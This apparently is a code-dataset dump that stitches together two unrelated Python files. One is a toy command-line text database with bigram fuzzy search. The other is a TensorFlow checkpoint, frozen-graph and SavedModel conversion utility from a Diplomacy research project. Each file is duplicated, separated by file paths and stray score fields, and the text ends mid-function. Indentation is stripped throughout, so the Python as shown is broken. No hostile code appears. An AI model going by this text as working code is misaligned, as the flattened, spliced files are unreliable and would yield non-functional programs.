tableObj = importCsv(csvName)
print("Imported %d rows to table %s." % (len(tableObj), args[1]))
g_tables.update({args[1] : tableObj})
print("Saving table %s to file." % args[1])
writeTable(args[1], tableObj)
except:
print("Failed to import table. Check URI.")
# listtables
elif args[0] == "listtables":
if len(args) < 1:
print(g_cmdHelpMap.get(args[0]))
else:
for x in listTables():
print(x)
# indextable
elif args[0] == "indextable":
if len(args) < 2:
print(g_cmdHelpMap.get(args[0]))
else:
if args[1] in g_tables:
tableIndex, tableFuzzy1, tableFuzzy2 = createIndex(g_tables.get(args[1]))
g_indices.update({args[1] : tableIndex})
g_fuzzyDict.update({args[1] : tableFuzzy1})
g_fuzzyDict2.update({args[1] : tableFuzzy2})
try:
print("Saving index %s." % args[1])
writeIndex(args[1], tableIndex)
print("Saving fuzzy %s." % args[1])
writeFuzzy(args[1], tableFuzzy1)
print("Saving fuzzy2 %s." % args[1])
writeFuzzy2(args[1], tableFuzzy2)
except:
print("Failed to write index to file.")
else:
print("Table %s does not exist." % args[1])
# find
elif args[0] == "find":
if len(args) < 3:
print(g_cmdHelpMap.get(args[0]))
else:
if args[1] not in g_tables:
print("Table %s does not exist." % args[1])
elif args[1] not in g_indices:
print("Index %s does not exist." % args[1])
elif args[1] not in g_fuzzyDict:
print("Fuzzy1 %s does not exist." % args[1])
elif args[1] not in g_fuzzyDict2:
print("Fuzzy2 %s does not exist." % args[1])
else:
results = find(set(args[2:]), g_tables.get(args[1]), g_indices.get(args[1]), g_fuzzyDict.get(args[1]), g_fuzzyDict2.get(args[1]), False)
for row in results:
print(row)
print("Found %d rows." % len(results))
# fuzzysearch
elif args[0] == "fuzzysearch":
if len(args) < 3:
print(g_cmdHelpMap.get(args[0]))
else:
if args[1] not in g_tables:
print("Table %s does not exist." % args[1])
elif args[1] not in g_indices:
print("Index %s does not exist." % args[1])
elif args[1] not in g_fuzzyDict:
print("Fuzzy1 %s does not exist." % args[1])
elif args[1] not in g_fuzzyDict2:
print("Fuzzy2 %s does not exist." % args[1])
else:
results = find(set(args[2:]), g_tables.get(args[1]), g_indices.get(args[1]), g_fuzzyDict.get(args[1]), g_fuzzyDict2.get(args[1]), True)
for row in results:
print(row)
print("Found %d rows." % len(results))
# Bad commands
else:
printHelp()
# Next loop
args = prompt()
return None
main() | PyAeonDB/PyAeonDB.py | from typing import List, Set, Dict, Tuple
import csv
import os
import json
import time
import datetime
Table = List[str]
Index = Dict[str, List[int]]
Fuzzy = Dict[str, List[str]]
ROOT_PATH = "C:/Arcology/AeonDB"
TABLE_DIR = "C:/Arcology/AeonDB/%s"
TABLE_PATH = "C:/Arcology/AeonDB/%s/table.txt"
INDEX_PATH = "C:/Arcology/AeonDB/%s/index.txt"
FUZZY_PATH = "C:/Arcology/AeonDB/%s/fuzzy.txt"
FUZZY2_PATH = "C:/Arcology/AeonDB/%s/fuzzy2.txt"
g_tables: Dict[str, Table] = dict()
g_indices: Dict[str, Index] = dict()
g_fuzzyDict: Dict[str, Fuzzy] = dict()
g_fuzzyDict2: Dict[str, Fuzzy] = dict()
def readTable(tableName: str) -> Table:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
return json.load(open(TABLE_PATH % tableName))
def writeTable(tableName: str, table: Table) -> None:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
json.dump(table, open(TABLE_PATH % tableName, 'w+'))
return None
def readIndex(tableName: str) -> Index:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
return json.load(open(INDEX_PATH % tableName))
def writeIndex(tableName: str, index: Index) -> None:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
json.dump(index, open(INDEX_PATH % tableName, 'w+'))
return None
def readFuzzy(tableName: str) -> Fuzzy:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
return json.load(open(FUZZY_PATH % tableName))
def writeFuzzy(tableName: str, fuzzy: Fuzzy) -> None:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
json.dump(fuzzy, open(FUZZY_PATH % tableName, 'w+'))
return None
def readFuzzy2(tableName: str) -> Fuzzy:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
return json.load(open(FUZZY2_PATH % tableName))
def writeFuzzy2(tableName: str, fuzzy: Fuzzy) -> None:
os.makedirs(TABLE_DIR % tableName, exist_ok=True)
json.dump(fuzzy, open(FUZZY2_PATH % tableName, 'w+'))
return None
def listTables() -> List[str]:
os.makedirs(ROOT_PATH, exist_ok=True)
return os.listdir(ROOT_PATH)
def timestamp() -> str:
return datetime.datetime.fromtimestamp(time.time()).strftime("%m/%d/%Y %H:%M:%S")
g_cmdHelpMap = {
"createtable" : "createTable {tableDesc}",
"getrows" : "getRows {tableName} {key} {count}",
"importtable" : "importTable {tableName} {CSV filespec}",
"listtables" : "listTables",
"indextable" : "indexTable {tableName}",
"find" : "find {tableName} {term1 term2 term3...}",
"fuzzysearch" : "fuzzySearch {tableName} {term1 term2 term3...}",
"quit" : "quit"
}
def printHelp() -> None:
for help in g_cmdHelpMap.values():
print(help)
return
def toBigrams(s: str) -> Set[str]:
ngrams = set()
if len(s) < 2:
ngrams.add(s)
return ngrams
for i in range(len(s) - 1):
ngrams.add(s[i:i+2])
return ngrams
def dicesCoefficient(a: Set[str], b: Set[str]) -> float:
return float(2 * len(a.intersection(b))) / float(len(a) + len(b))
def preprocess(s: str) -> str:
s = s.replace("~", " ")
s = s.replace("`", " ")
s = s.replace("!", " ")
s = s.replace("@", " ")
s = s.replace("#", " ")
s = s.replace("$", " ")
s = s.replace("%", " ")
s = s.replace("^", " ")
s = s.replace("&", " ")
s = s.replace("*", " ")
s = s.replace("(", " ")
s = s.replace(")", " ")
s = s.replace("-", " ")
s = s.replace("_", " ")
s = s.replace("+", " ")
s = s.replace("=", " ")
s = s.replace("{", " ")
s = s.replace("}", " ")
s = s.replace("[", " ")
s = s.replace("]", " ")
s = s.replace("|", " ")
s = s.replace("\\", " ")
s = s.replace(";", " ")
s = s.replace(":", " ")
s = s.replace('"', " ")
s = s.replace("'", " ")
s = s.replace("<", " ")
s = s.replace(">", " ")
s = s.replace(",", " ")
s = s.replace(".", " ")
s = s.replace("/", " ")
s = s.replace("?", " ")
s = s.replace("1", " ")
s = s.replace("2", " ")
s = s.replace("3", " ")
s = s.replace("4", " ")
s = s.replace("5", " ")
s = s.replace("6", " ")
s = s.replace("7", " ")
s = s.replace("8", " ")
s = s.replace("9", " ")
s = s.replace("0", " ")
return s
def createIndex(table: Table) -> Tuple[Index, Fuzzy, Fuzzy]:
startTime = time.time()
index: Index = dict()
fuzzy1: Fuzzy = dict()
fuzzy2: Fuzzy = dict()
fuzzy3: Dict[str, Set[str]] = dict()
for rowId in range(len(table)):
row = table[rowId]
row = preprocess(row).lower()
terms = set(row.split())
if "" in terms:
terms.remove("")
for term in terms:
if term not in index:
index.update({term: list()})
rowIds = index.get(term)
if rowId not in rowIds:
rowIds.append(rowId)
if term not in fuzzy3:
atLeastOneBigram = set()
bigrams = toBigrams(term)
fuzzy3.update({term: bigrams})
for bigram in bigrams:
if bigram not in fuzzy2:
fuzzy2.update({bigram: list()})
bigramList = fuzzy2.get(bigram)
bigramList.append(term)
atLeastOneBigram.update(bigramList)
related = list()
for term2 in atLeastOneBigram:
if term == term2:
related.append(term2)
elif dicesCoefficient(fuzzy3.get(term), fuzzy3.get(term2)) > 0.6:
related.append(term2)
fuzzy1.get(term2).append(term)
fuzzy1.update({term: related})
print("Indexed row %d of %d." % (rowId, len(table)))
print("Indexing Time: " + str(time.time() - startTime))
return index, fuzzy1, fuzzy2
def importCsv(filename: str) -> Table:
table = [" ".join(row) for row in csv.reader(open(filename))]
table.pop(0)
return table
def expandQuery(term: str, index: Index, fuzzy: Fuzzy, fuzzy2: Fuzzy) -> Set[int]:
rowIds = set()
relateds = set()
if term not in fuzzy:
possiblyRelateds = set()
bigrams = toBigrams(term)
for bigram in bigrams:
if bigram in fuzzy2:
possiblyRelateds.update(fuzzy2.get(bigram))
for pRelated in possiblyRelateds:
if dicesCoefficient(toBigrams(pRelated), bigrams) > 0.6:
relateds.add(pRelated)
else:
relateds = fuzzy.get(term)
for related in relateds:
rowIds.update(index.get(related))
return rowIds
def find(keyTerms: Set[str], table: Table, index: Index, fuzzy: Fuzzy, fuzzy2: Fuzzy, isFuzzy: bool) -> Table:
lowKeyTerms = {term.lower() for term in keyTerms}
rowIds = set()
results = list()
first = lowKeyTerms.pop()
if isFuzzy:
rowIds.update(expandQuery(first, index, fuzzy, fuzzy2))
elif first in index:
rowIds.update(index.get(first))
else:
return results
for word in lowKeyTerms:
if isFuzzy:
rowIds.intersection_update(expandQuery(word, index, fuzzy, fuzzy2))
elif word in index:
rowIds.intersection_update(index.get(word))
else:
return results
for i in rowIds:
results.append(table[i])
return results
def loadAllTables() -> None:
tableNames = listTables()
for tableName in tableNames:
print("%s Log.info: Table %s: Backup volume offline. Waiting for new volume." % (timestamp(), tableName))
try:
table = readTable(tableName)
g_tables.update({tableName: table})
print("%s Log.info: Table %s: Recovered %d rows." % (timestamp(), tableName, len(table)))
except OSError:
print("%s Log.info: Table %s: Could not read file." % (timestamp(), tableName))
except json.JSONDecodeError:
print("%s Log.info: Table %s: File is corrupted." % (timestamp(), tableName))
try:
index = readIndex(tableName)
g_indices.update({tableName: index})
print("%s Log.info: Index %s: Recovered %d terms." % (timestamp(), tableName, len(index)))
except OSError:
print("%s Log.info: Index %s: Could not read file." % (timestamp(), tableName))
except json.JSONDecodeError:
print("%s Log.info: Index %s: File is corrupted." % (timestamp(), tableName))
try:
fuzzy = readFuzzy(tableName)
g_fuzzyDict.update({tableName: fuzzy})
print("%s Log.info: Fuzzy %s: Recovered %d terms." % (timestamp(), tableName, len(fuzzy)))
except OSError:
print("%s Log.info: Fuzzy %s: Could not read file." % (timestamp(), tableName))
except json.JSONDecodeError:
print("%s Log.info: Fuzzy %s: File is corrupted." % (timestamp(), tableName))
try:
fuzzy2 = readFuzzy2(tableName)
g_fuzzyDict2.update({tableName: fuzzy2})
print("%s Log.info: Fuzzy2 %s: Recovered %d terms." % (timestamp(), tableName, len(fuzzy2)))
except OSError:
print("%s Log.info: Fuzzy2 %s: Could not read file." % (timestamp(), tableName))
except json.JSONDecodeError:
print("%s Log.info: Fuzzy2 %s: File is corrupted." % (timestamp(), tableName))
print("AeonDB ready. %d tables available." % len(tableNames))
return None
def prompt() -> List[str]:
args = input(" : ").split()
args[0] = args[0].lower()
return args
def main() -> None:
print("%s AeonDB 1.0 beta 65" % timestamp())
print(u"%s Copyright © 2011-2018 by Kronosaur Productions LLC. All Rights Reserved." % timestamp())
loadAllTables()
args = prompt()
while args[0] != "quit":
# createtable
if args[0] == "createtable":
if len(args) < 2:
print(g_cmdHelpMap.get(args[0]))
else:
print("Not implemented for demo.")
# getrows
elif args[0] == "getrows":
if len(args) < 4:
print(g_cmdHelpMap.get(args[0]))
else:
print("Not implemented for demo.")
# importtable
elif args[0] == "importtable":
if len(args) < 3:
print(g_cmdHelpMap.get(args[0]))
else:
csvName = args[2]
csvName = csvName.replace('"', "")
csvName = csvName.replace("'", "")
csvName = csvName.replace("/", "\\")
try:
tableObj = importCsv(csvName)
print("Imported %d rows to table %s." % (len(tableObj), args[1]))
g_tables.update({args[1] : tableObj})
print("Saving table %s to file." % args[1])
writeTable(args[1], tableObj)
except:
print("Failed to import table. Check URI.")
# listtables
elif args[0] == "listtables":
if len(args) < 1:
print(g_cmdHelpMap.get(args[0]))
else:
for x in listTables():
print(x)
# indextable
elif args[0] == "indextable":
if len(args) < 2:
print(g_cmdHelpMap.get(args[0]))
else:
if args[1] in g_tables:
tableIndex, tableFuzzy1, tableFuzzy2 = createIndex(g_tables.get(args[1]))
g_indices.update({args[1] : tableIndex})
g_fuzzyDict.update({args[1] : tableFuzzy1})
g_fuzzyDict2.update({args[1] : tableFuzzy2})
try:
print("Saving index %s." % args[1])
writeIndex(args[1], tableIndex)
print("Saving fuzzy %s." % args[1])
writeFuzzy(args[1], tableFuzzy1)
print("Saving fuzzy2 %s." % args[1])
writeFuzzy2(args[1], tableFuzzy2)
except:
print("Failed to write index to file.")
else:
print("Table %s does not exist." % args[1])
# find
elif args[0] == "find":
if len(args) < 3:
print(g_cmdHelpMap.get(args[0]))
else:
if args[1] not in g_tables:
print("Table %s does not exist." % args[1])
elif args[1] not in g_indices:
print("Index %s does not exist." % args[1])
elif args[1] not in g_fuzzyDict:
print("Fuzzy1 %s does not exist." % args[1])
elif args[1] not in g_fuzzyDict2:
print("Fuzzy2 %s does not exist." % args[1])
else:
results = find(set(args[2:]), g_tables.get(args[1]), g_indices.get(args[1]), g_fuzzyDict.get(args[1]), g_fuzzyDict2.get(args[1]), False)
for row in results:
print(row)
print("Found %d rows." % len(results))
# fuzzysearch
elif args[0] == "fuzzysearch":
if len(args) < 3:
print(g_cmdHelpMap.get(args[0]))
else:
if args[1] not in g_tables:
print("Table %s does not exist." % args[1])
elif args[1] not in g_indices:
print("Index %s does not exist." % args[1])
elif args[1] not in g_fuzzyDict:
print("Fuzzy1 %s does not exist." % args[1])
elif args[1] not in g_fuzzyDict2:
print("Fuzzy2 %s does not exist." % args[1])
else:
results = find(set(args[2:]), g_tables.get(args[1]), g_indices.get(args[1]), g_fuzzyDict.get(args[1]), g_fuzzyDict2.get(args[1]), True)
for row in results:
print(row)
print("Found %d rows." % len(results))
# Bad commands
else:
printHelp()
# Next loop
args = prompt()
return None
main() | 0.395718 | 0.168344 |
from datetime import datetime
import glob
import logging
import os
from pydoc import locate
import shutil
import sys
import time
from pytz import timezone
from diplomacy_research.models.datasets.base_builder import BaseBuilder
# Constants
LOGGER = logging.getLogger(__name__)
MODEL_PATHS = {'/token_based/v': 'diplomacy_research/models/policy/token_based',
'/order_based/v': 'diplomacy_research/models/policy/order_based'}
def load_graph_from_ckpt(checkpoint_path, meta_graph_path=None, graph=None, session=None):
""" Builds a graph and a session from a specific checkpoint
This loads the model into a new graph, and doesn't affect the default graph
:param checkpoint_path: The checkpoint path. Can be a checkpoint directory, or a specific checkpoint in
that directory
:param meta_graph_path: (Optional) The path to the saved meta graph (.meta). Will be detected automatically
if not provided
:param graph: The graph object were to load the model. A new graph will be created if not provided.
:param session: The session object to use to load the model. A new session will be created if not provided.
:return: The graph and the session object where the checkpoint was loaded.
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
from diplomacy_research.utils.tensorflow import tf
dir_path, filename = os.path.split(checkpoint_path)
# checkpoint_path is a directory - Loading latest checkpoint in directory
if os.path.isdir(checkpoint_path):
checkpoint = tf.train.latest_checkpoint(checkpoint_path)
if meta_graph_path is None:
meta_graph_path = max(glob.iglob(os.path.join(checkpoint_path, '*.meta')), key=os.path.getctime)
# checkpoint_path is a checkpoint file - Loading latest checkpoint in directory
elif filename == 'checkpoint':
checkpoint = tf.train.latest_checkpoint(dir_path, 'checkpoint')
if meta_graph_path is None:
meta_graph_path = max(glob.iglob(os.path.join(dir_path, '*.meta')), key=os.path.getctime)
# Loading a specific checkpoint
else:
# Removing extension
if len(filename.split('.')) > 2:
checkpoint_path = os.path.join(dir_path, '.'.join(filename.split('.')[:2]))
checkpoint = checkpoint_path
if meta_graph_path is None:
if os.path.exists('{}.meta'.format(checkpoint_path)):
meta_graph_path = '{}.meta'.format(checkpoint_path)
else:
meta_graph_path = max(glob.iglob(os.path.join(dir_path, '*.meta')), key=os.path.getctime)
# Loading the checkpoint in the graph
graph = tf.Graph() if graph is None else graph
with graph.as_default():
session = tf.Session(graph=graph) if session is None else session
saver = tf.train.import_meta_graph(meta_graph_path)
saver.restore(session, checkpoint)
# Returning graph and session
return graph, session
def freeze_graph(frozen_dir, version_id, graph, session, history_saver=None):
""" Freezes a graph and saves a checkpoint and the frozen graph to disk
:param frozen_dir: The path where to save the checkpoint and frozen graph
:param version_id: Integer. The version id to append to the filename.
:param graph: The graph object to save
:param session: The session associated with the graph
:param history_saver: Optional. The saver to use to save historical checkpoints, otherwise no checkpoints will
be created and the graph will only be frozen.
:return: Nothing
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
checkpoint_path = os.path.join(frozen_dir, 'checkpoint-v%09d' % version_id)
frozen_path = os.path.join(frozen_dir, 'frozen_graph-v%09d.pb' % version_id)
# Making sure frozen directory exists
if not os.path.exists(frozen_dir):
os.makedirs(frozen_dir, exist_ok=True)
# Creating a checkpoint
if history_saver is not None:
with graph.as_default():
history_saver.save(session, checkpoint_path)
# Freezing graph
convert_ckpt_to_frozen_graph(checkpoint_path=None,
frozen_graph_path=frozen_path,
graph=graph,
session=session)
def build_saved_model(saved_model_dir, version_id, signature, proto_fields, graph, session, history_saver=None):
""" Builds a SavedModel and a checkpoint from the graph
:param saved_model_dir: The path where to save the checkpoint and SavedModel
:param version_id: Integer. The version_id of the SavedModel to save.
:param signature: The output of adapter.get_signature() - signature of all the possible calls
:param proto_fields: A dictionary of features name with their proto field description
:param graph: The graph object to save
:param session: The session associated with the graph
:param history_saver: Optional. The saver to use to save historical checkpoints, otherwise no checkpoints will
be created and the graph will only be converted to SavedModel.
:return: Nothing
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
checkpoint_path = os.path.join(saved_model_dir, 'checkpoint-v%09d' % version_id)
saved_model_path = os.path.join(saved_model_dir, '%09d' % version_id)
# Making sure saved model directory exists
if not os.path.exists(saved_model_dir):
os.makedirs(saved_model_dir, exist_ok=True)
# Creating a checkpoint
if history_saver is not None:
with graph.as_default():
history_saver.save(session, checkpoint_path)
# Building saved model
convert_ckpt_to_saved_model(checkpoint_path=None,
saved_model_path=saved_model_path,
signature=signature,
proto_fields=proto_fields,
graph=graph,
session=session)
def convert_ckpt_to_frozen_graph(checkpoint_path, frozen_graph_path, meta_graph_path=None, graph=None, session=None):
""" Converts a checkpoint to a frozen (meta) graph with fixed weights for faster inference
:param checkpoint_path: The path to the checkpoint file (can be a directly, or a checkpoint file)
:param frozen_graph_path: The path where to saved the frozen_graph_path
:param meta_graph_path: Optional. The path of the meta_graph. Will be detected automatically if not provided.
:param graph: The graph object were to load the model. A new graph will be created if not provided.
:param session: The session object to use to load the model. A new session will be created if not provided.
:return: The graph and the session object used to load the checkpoint.
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
from diplomacy_research.utils.tensorflow import tf, graph_util, variables
# Loading the checkpoint from disk
if graph is None or session is None:
graph, session = load_graph_from_ckpt(checkpoint_path,
meta_graph_path=meta_graph_path,
graph=graph,
session=session)
# Converting graph to constant
input_graph_def = graph.as_graph_def()
output_keys = [k for k in graph.get_all_collection_keys() if ('variable' not in k.lower()
and '_step' not in k
and '_op' not in k
and '_context' not in k
and not k.startswith('_')
and not k.endswith('_ta')
and 'summaries' not in k
and 'is_trainable' not in k)]
# Making sure we are saving an iterator, otherwise the model will not be usable
if not [key for key in output_keys if 'iterator_resource' in key]:
LOGGER.error('Trying to freeze a model without an "iterator_resource" key. Model will not be usable. Aborting')
raise RuntimeError('Missing "iterator_resource" to freeze model.')
# Finding output nodes and extra tags
extra_tags = {}
output_nodes = []
for key in output_keys:
nodes_in_collection = graph.get_collection(key)
for node in nodes_in_collection:
if isinstance(node, variables.PartitionedVariable):
output_nodes += [var.name for var in node._get_variable_list()] # pylint: disable=protected-access
elif hasattr(node, 'name'):
output_nodes += [node.name]
else:
extra_tags.setdefault(key, [])
extra_tags[key] += [node]
# Freezing graph
output_graph_def = graph_util.convert_variables_to_constants(session,
input_graph_def,
[node.split(':')[0] for node in output_nodes])
# Storing date/time, original filename, and launch args
created_date = datetime.fromtimestamp(time.time(), timezone('America/Montreal'))
extra_tags['tag/created_date'] = [created_date.strftime("%Y-%m-%d %H:%M:%S %Z")]
extra_tags['tag/filename'] = [frozen_graph_path.split('/')[-1]]
extra_tags['tag/launch_cmd'] = [' '.join(sys.argv)]
# Importing in a new graph
output_graph = tf.Graph()
with output_graph.as_default():
tf.import_graph_def(output_graph_def)
# Transferring collections
collection_keys = graph.get_all_collection_keys()
for key in collection_keys:
if 'variable' in key.lower() or '_op' in key:
continue
nodes = graph.get_collection(key)
for node in nodes:
if hasattr(node, 'name'):
try:
tensor_name = 'import/{}{}'.format(node.name, ':0' if ':' not in node.name else '')
tensor_node = output_graph.get_tensor_by_name(tensor_name)
output_graph.add_to_collection(key, tensor_node)
except KeyError:
pass
# Adding extra tags
for key in extra_tags:
for value in extra_tags[key]:
output_graph.add_to_collection(key, value)
# Saving the frozen graph to disk
with output_graph.as_default():
tf.train.export_meta_graph(frozen_graph_path,
graph_def=output_graph.as_graph_def(),
clear_devices=True)
# Returning
return graph, session
def convert_ckpt_to_saved_model(checkpoint_path, saved_model_path, signature, proto_fields, meta_graph_path=None,
graph=None, session=None):
""" Converts a checkpoint to a SavedModel with fixed weights for faster inference
:param checkpoint_path: The path to the checkpoint file (can be a directly, or a checkpoint file)
:param saved_model_path: The path where to saved the SavedModel
:param signature: The output of adapter.get_signature() - signature of all the possible calls
:param proto_fields: A dictionary of features name with their proto field description
:param meta_graph_path: Optional. The path of the meta_graph. Will be detected automatically if not provided.
:param graph: The graph object were to load the model. A new graph will be created if not provided.
:param session: The session object to use to load the model. A new session will be created if not provided.
:return: The graph and the session object used to load the checkpoint.
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
from diplomacy_research.utils.tensorflow import tf, graph_util, build_tensor_info, saved_model_builder, \
signature_def_utils, tag_constants, variables, PREDICT_METHOD_NAME
# Loading the checkpoint from disk
if graph is None or session is None:
graph, session = load_graph_from_ckpt(checkpoint_path,
meta_graph_path=meta_graph_path,
graph=graph,
session=session)
# Converting graph to constant
input_graph_def = graph.as_graph_def()
output_keys = [k for k in graph.get_all_collection_keys() if ('variable' not in k.lower()
and '_step' not in k
and '_op' not in k
and '_context' not in k
and not k.startswith('_')
and not k.endswith('_ta')
and 'summaries' not in k
and 'is_trainable' not in k)]
# Finding output nodes and extra tags
extra_tags = {}
output_nodes = []
for key in output_keys:
nodes_in_collection = graph.get_collection(key)
for node in nodes_in_collection:
if isinstance(node, variables.PartitionedVariable):
output_nodes += [var.name for var in node._get_variable_list()] # pylint: disable=protected-access
elif hasattr(node, 'name'):
output_nodes += [node.name]
else:
extra_tags.setdefault(key, [])
extra_tags[key] += [node]
# Converting graph to constant
output_graph_def = graph_util.convert_variables_to_constants(session,
input_graph_def,
[node.split(':')[0] for node in output_nodes])
# Storing date/time, original filename, and launch args
created_date = datetime.fromtimestamp(time.time(), timezone('America/Montreal'))
extra_tags['tag/created_date'] = [created_date.strftime("%Y-%m-%d %H:%M:%S %Z")]
extra_tags['tag/filename'] = [saved_model_path.split('/')[-1]]
extra_tags['tag/launch_cmd'] = [' '.join(sys.argv)]
# Importing in a new graph
output_graph = tf.Graph()
with output_graph.as_default():
tf.import_graph_def(output_graph_def)
# Finding placeholders, features, and outputs
features, placeholders, outputs = {}, {}, {}
collection_keys = graph.get_all_collection_keys()
for key in collection_keys:
node = graph.get_collection(key)
if isinstance(node, list) and node: # If list, getting first element
node = node[0]
if key.startswith('feature'):
features[key.replace('feature_', '')] = output_graph.get_tensor_by_name('import/' + node.name)
elif key.startswith('placeholder'):
placeholders[key.replace('placeholder_', '')] = output_graph.get_tensor_by_name('import/' + node.name)
elif hasattr(node, 'name'):
try:
outputs[key] = output_graph.get_tensor_by_name('import/' + node.name)
except (KeyError, ValueError):
continue
# Adding extra tags
for key in extra_tags:
for value in extra_tags[key]:
output_graph.add_to_collection(key, value)
# Converting sparse fields
proto_fields = BaseBuilder.parse_sparse_fields(proto_fields)
# Building signature
signature_def = {}
for method_name in signature:
method_placeholders = signature.get(method_name).get('placeholders', {})
method_outputs = signature.get(method_name).get('outputs', [])
# Skipping method if we are missing some outputs
missing_outputs = [output_name for output_name in method_outputs if output_name not in outputs]
if missing_outputs:
LOGGER.warning('Unable to build method %s using the provided signature.', method_name)
continue
signature_inputs = {feature_name: build_tensor_info(features[feature_name]) for feature_name in features
if feature_name in proto_fields}
for ph_name in method_placeholders:
signature_inputs[ph_name] = build_tensor_info(placeholders[ph_name])
signature_outputs = {'%03d_%s' % (output_id, output_name): build_tensor_info(outputs[output_name])
for output_id, output_name in enumerate(method_outputs)}
signature_def[method_name] = signature_def_utils.build_signature_def(inputs=signature_inputs,
outputs=signature_outputs,
method_name=PREDICT_METHOD_NAME)
# Saving to disk
with output_graph.as_default():
temp_model_path = '/'.join(saved_model_path.split('/')[:-1] + ['__%s__' % saved_model_path.split('/')[-1]])
# Deleting from disk to avoid 'Directory already exists'
shutil.rmtree(saved_model_path, ignore_errors=True)
shutil.rmtree(temp_model_path, ignore_errors=True)
# Saving to a temporary path, to make sure the serving does not try to load the version before it is ready
builder = saved_model_builder.SavedModelBuilder(temp_model_path)
builder.add_meta_graph_and_variables(session,
[tag_constants.SERVING],
signature_def_map=signature_def,
clear_devices=True)
builder.save()
# Renaming to the correct path
shutil.move(temp_model_path, saved_model_path)
# Returning
return graph, session
def load_frozen_graph(frozen_graph_path, graph=None, session=None):
""" Loads a frozen graph from disk
:param frozen_graph_path: The path where the frozen graph is located
:param graph: The graph object were to load the model. A new graph will be created if not provided.
:param session: The session object to use to load the model. A new session will be created if not provided.
:return: The graph and the session object used to load the frozen graph.
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
from diplomacy_research.utils.tensorflow import tf, tf_logging
# Making sure the path exists
if not os.path.exists(frozen_graph_path):
LOGGER.error('The frozen graph %s does not exist.', frozen_graph_path)
raise FileNotFoundError()
# Load the frozen (meta) graph into a TF graph
graph = tf.Graph() if graph is None else graph
with graph.as_default():
session = tf.Session(graph=graph) if session is None else session
# Not showing "Saver not created because there are no variables in the graph to restore" messages
tf_logging.set_verbosity('ERROR')
tf.train.import_meta_graph(frozen_graph_path, clear_devices=True)
tf_logging.set_verbosity('INFO')
return graph, session
def get_constructors_from_frozen_graph(model_path):
""" Finds the BaseDatasetBuilder and the PolicyAdapter from a frozen checkpoint from disk
:param model_path: The path to the frozen checkpoint
:return: The BaseDatasetBuilder and the PolicyAdapter object linked to this model, otherwise (None, None)
"""
base_dir = None
model_name = None
# Making sure model exists
if not os.path.exists(model_path):
LOGGER.info('Unable to find model at %s', model_path)
return None, None
# Loading graph
graph, _ = load_frozen_graph(model_path)
# Detecting model type
tags = sorted([key for key in graph.get_all_collection_keys() if 'tag/' in key])
for tag_name in tags:
if 'tag' in tag_name:
for search_key in MODEL_PATHS:
if search_key in tag_name:
base_dir = MODEL_PATHS[search_key]
model_name = tag_name
# No base dir found
if base_dir is None or model_name is None:
LOGGER.info('Unable to detect the model used to generate this file.')
return None, None
# Loading the base dataset builder, and the policy adapter
base_dataset_builder = locate('%s.BaseDatasetBuilder' % base_dir.replace('/', '.'))
policy_adapter = locate('%s.PolicyAdapter' % base_dir.replace('/', '.'))
# Returning
return base_dataset_builder, policy_adapter | diplomacy_research/utils/checkpoint.py | from datetime import datetime
import glob
import logging
import os
from pydoc import locate
import shutil
import sys
import time
from pytz import timezone
from diplomacy_research.models.datasets.base_builder import BaseBuilder
# Constants
LOGGER = logging.getLogger(__name__)
MODEL_PATHS = {'/token_based/v': 'diplomacy_research/models/policy/token_based',
'/order_based/v': 'diplomacy_research/models/policy/order_based'}
def load_graph_from_ckpt(checkpoint_path, meta_graph_path=None, graph=None, session=None):
""" Builds a graph and a session from a specific checkpoint
This loads the model into a new graph, and doesn't affect the default graph
:param checkpoint_path: The checkpoint path. Can be a checkpoint directory, or a specific checkpoint in
that directory
:param meta_graph_path: (Optional) The path to the saved meta graph (.meta). Will be detected automatically
if not provided
:param graph: The graph object were to load the model. A new graph will be created if not provided.
:param session: The session object to use to load the model. A new session will be created if not provided.
:return: The graph and the session object where the checkpoint was loaded.
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
from diplomacy_research.utils.tensorflow import tf
dir_path, filename = os.path.split(checkpoint_path)
# checkpoint_path is a directory - Loading latest checkpoint in directory
if os.path.isdir(checkpoint_path):
checkpoint = tf.train.latest_checkpoint(checkpoint_path)
if meta_graph_path is None:
meta_graph_path = max(glob.iglob(os.path.join(checkpoint_path, '*.meta')), key=os.path.getctime)
# checkpoint_path is a checkpoint file - Loading latest checkpoint in directory
elif filename == 'checkpoint':
checkpoint = tf.train.latest_checkpoint(dir_path, 'checkpoint')
if meta_graph_path is None:
meta_graph_path = max(glob.iglob(os.path.join(dir_path, '*.meta')), key=os.path.getctime)
# Loading a specific checkpoint
else:
# Removing extension
if len(filename.split('.')) > 2:
checkpoint_path = os.path.join(dir_path, '.'.join(filename.split('.')[:2]))
checkpoint = checkpoint_path
if meta_graph_path is None:
if os.path.exists('{}.meta'.format(checkpoint_path)):
meta_graph_path = '{}.meta'.format(checkpoint_path)
else:
meta_graph_path = max(glob.iglob(os.path.join(dir_path, '*.meta')), key=os.path.getctime)
# Loading the checkpoint in the graph
graph = tf.Graph() if graph is None else graph
with graph.as_default():
session = tf.Session(graph=graph) if session is None else session
saver = tf.train.import_meta_graph(meta_graph_path)
saver.restore(session, checkpoint)
# Returning graph and session
return graph, session
def freeze_graph(frozen_dir, version_id, graph, session, history_saver=None):
""" Freezes a graph and saves a checkpoint and the frozen graph to disk
:param frozen_dir: The path where to save the checkpoint and frozen graph
:param version_id: Integer. The version id to append to the filename.
:param graph: The graph object to save
:param session: The session associated with the graph
:param history_saver: Optional. The saver to use to save historical checkpoints, otherwise no checkpoints will
be created and the graph will only be frozen.
:return: Nothing
:type graph: tensorflow.python.framework.ops.Graph
:type session: tensorflow.python.client.session.Session
"""
checkpoint_path = os.path.join(frozen_dir, 'checkpoint-v%09d' % version_id)
